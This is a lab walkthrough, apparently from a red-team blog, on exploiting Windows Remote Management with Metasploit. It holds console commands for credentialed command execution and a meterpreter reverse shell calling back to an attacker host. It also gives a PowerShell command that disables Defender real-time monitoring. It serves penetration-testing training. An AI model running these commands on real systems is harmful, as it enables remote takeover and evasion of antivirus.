- In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.
exploitation:
- Open kali for scanning and exploitation:

- Open up
msfconsolefor exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
- By default the command that will execute it is
ipconfig /all

- Remember the setup of localuser for
winrmaccess where we gave access to the usersysadmin, let’s try that:

- It actually worked.
- Now let’s try for Remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
- Also turn off
real time protectionin yourwindwos server, because it willquarantinethe execution.
- use this command on
powershellinto yourDC
Set-MpPreference -DisableRealtimeMonitoring $true
3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options:
msf exploit(windows/winrm/winrm_script_exec) > set DOMAIN REDTEAMLAB
DOMAIN => REDTEAMLAB
msf exploit(windows/winrm/winrm_script_exec) > set USERNAME Administrator
USERNAME => Administrator
msf exploit(windows/winrm/winrm_script_exec) > set PASSWORD Password123
PASSWORD => Password123
msf exploit(windows/winrm/winrm_script_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS false
FORCE_VBS => false

- run the exploit:
